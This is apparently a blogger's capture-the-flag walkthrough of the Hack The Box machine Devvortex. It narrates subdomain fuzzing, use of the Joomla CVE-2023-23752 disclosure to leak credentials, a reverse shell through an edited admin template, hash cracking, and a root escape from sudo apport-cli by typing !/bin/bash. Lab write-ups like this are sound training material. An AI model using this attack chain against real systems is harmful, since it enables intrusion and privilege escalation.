Devvortex
This is my 3rd attempt at writing this because I lost all my progress the other times, so if it’s not perfect please excuse me. I have been extremely frustrated with it, but I refuse to not put it out.
I learned my lesson. Hit save often so you don’t go to sleep in tears from wasted time.
Reconnaissance:
So first lets start with our scan. I like to use -vvv for a nice fast scan and then gather more information with what I get.
Now we scan what we gathered.
So we know we have a webpage so lets add to /etc/hosts and check the web page.
After taking a look around the webpage there isn’t much. There are no forms for injection or anything sticking out and there is no login page so lets directory bust. (I did check robots.txt always check it)
And we ended up with a whole lot of nothing. Fantastic. However, if you can go forward into directories, I remembered you can go backward into subdomains.
My tool of choice ffuf for this but you can use other tools like gobuster or sublist3r.
Go ahead and steal the command above.
After doing the directory bust with fuzz we get a lot of fluff.
The byte size for what we see is 154 so lets get rid of it with the -fs switch.
We got dev. Sweet lets add to our /etc/hosts and check it.
Lets navigate to it and check /robots.txt
(I know there is a better way to deal with virtual hosting and subdomains so you dont have to add each individual one. I learned it from an OffSec stream and I dont know where I wrote it down. Noob move.)
Is that an admin panel?
Foothold:
It is in fact an admin login. I tried default creds but got nowhere. I also read some of the documentation in “forgot your login details”. As I was reading I thought well I don’t know the version to do some research for exploits.
So I did research on finding a version, and used that - thank you HackTrickz.
Version 4.2.6, now we have something. Time to go research.
I found an exploit using CVE-2023-23752 but I dont remember the random site as it got lost in the first version of writing this.
Leveraging the exploit we get the result above. But it looks like dogwater, we can make it look better.
We pipe the command to ‘jq’
Now isn’t that way prettier? If you scroll down you will see the password nicely stored for your viewing pleasure.
I immediately tried to use the creds for ssh that we found in our nmap scan. That failed but we had the admin page so I logged in there and it worked like a charm.
Once in the page I knew there was a way to get a reverse shell because I have done it before.
In the site templates do you see how it says “site templates” and “Administrator Templates”… yeah that’s awesome. I did not see this for the longest time and could not understand for the life of me why I could not edit the site templates as an administrator.
Don’t be like me.
Exploitation:
This is the correct admin template you wanted.
Using that I was able to pop a shell. Once I got in I was able to enumerate what was on the machine and something I found was a mysql service running and we had creds so we might as well try.
Again this is where I lost one of the pictures I initially had for you but poof computer deleted them.
So we were able to log in.
Now I’m a big fan of just dumping everything from a table because....well I’m lazy if were being honest but this looked like crap
I went ahead and made it just a little bit better by selecting what we needed. I think its better to work with everything and then tune it to what you need anyway.
now we know we can crack this…. or atleast we should. I have the hashcrackbook on my desk here so I looked at that but if you read the hashcat manpages it should tell you what to use.
You could use john/jtr as an alternative, up to you.
We got a new password. Lets try to use it to login to ssh, then do some recon if it works.
It worked.
I like to run sudo -l, whoami, uname -a, ifconfig, netstat -ano, ps -ef and getcap -r / 2>dev/null before doing anything. You can also start trying to transfer things like linpeas etc. but I like manual gathering.
sudo -l gives us /usr/bin/apport-cli nice. We need a version.
After doing some research I found that you can exploit the
sudo -l gives us acess to what we can use. We can use /usr/bin/apport-cli but I spent so much time looking on how to generate a crash file its embarrasing.
Finally, I tried to just use the program itself and used the -f option.
It literally can generate files for you.
Privilege Escalation:
lets just pick 1 and see what happens.
Now lets go forward and press 3 (to be completely honest this was a miss click and I meant to press 2 but lest just go with it)
When you get to the final option press "V" to view.
Now type in !/bin/bash and you get root
Now do what you do. We are root.
Post Exploitation:
Grab that flag.
As always, stay curious my friends.